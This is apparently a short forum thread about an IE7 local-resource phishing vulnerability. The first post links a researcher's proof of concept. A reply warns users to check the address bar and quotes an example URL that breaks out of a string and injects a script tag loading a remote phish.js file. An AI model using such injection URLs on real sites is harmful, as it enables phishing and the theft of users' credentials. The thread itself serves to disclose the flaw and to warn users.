IE7 Phishing Hole Info and Proof of Concept released

A vulnerability has been found in IE7 that would allow a Phishing site
to be displayed on a users screen...

The user has provied proof if concept code that can show you the
problem in action.

"Phishing using IE7 local resource vulnerability" at 'Aviv Raff On .NET
- Phishing using IE7 local resource vulnerability'
(http://tinyurl.com/29mbtf)


--
Steve
Posted via http://www.vistaheads.com

Read what is in the address bar! Of course, they could make the link long
enough that you don't see what else is in the field.

http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document.write('<script%20src=\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\'></script>');//

^ Doesn't look like what should normally be in the address bar if you go to
cnn.com. Too much javascript.

--
/* * * * * * * * * * * * * * * * * *
* Robert Firth *
* Windows Vista x86 RTM *
* http://www.WinVistaInfo.org *
* * * * * * * * * * * * * * * * * */

"Steve" <Steve.2ngto1@no-mx.forums.vistaheads.com> wrote in message
news:Steve.2ngto1@no-mx.forums.vistaheads.com...
>
> A vulnerability has been found in IE7 that would allow a Phishing site
> to be displayed on a users screen...
>
> The user has provied proof if concept code that can show you the
> problem in action.
>
> "Phishing using IE7 local resource vulnerability" at 'Aviv Raff On .NET
> - Phishing using IE7 local resource vulnerability'
> (http://tinyurl.com/29mbtf)
>
>
> --
> Steve
> Posted via http://www.vistaheads.com
>